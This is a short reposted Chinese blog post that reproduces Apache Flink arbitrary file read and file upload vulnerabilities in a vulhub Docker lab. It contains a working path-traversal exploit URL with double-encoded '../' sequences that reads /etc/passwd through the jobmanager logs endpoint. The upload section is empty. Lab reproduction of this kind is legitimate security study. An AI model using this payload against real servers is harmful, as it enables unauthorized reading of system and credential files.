apache flink任意文件讀取&文件上傳漏洞復現

本文轉載自查看原文 2021-07-09 15:43 133 web安全

vvulhub搭建

docker-compose up -d

訪問8081端口，進入控制面板

任意文件讀取exp

http:/x.x.x.x:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

文件上傳

------------------

本來還想試一下反彈shell，但是因為docker環境部署在了公網ip上，反彈shell比較麻煩，就不再試了

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 Apache Solr任意文件讀取漏洞復現 Apache Solr任意文件讀取漏洞復現 Apache Solr任意文件讀取漏洞復現 Adminer任意文件讀取漏洞復現【漏洞復現】CVE-2021-36749 Apache Druid LoadData 任意文件讀取漏洞致遠OA任意文件上傳漏洞復現 CVE-2019-2618任意文件上傳漏洞復現用友NC任意文件上傳漏洞復現任意文件上傳漏洞 Apache Solr最新任意文件讀取漏洞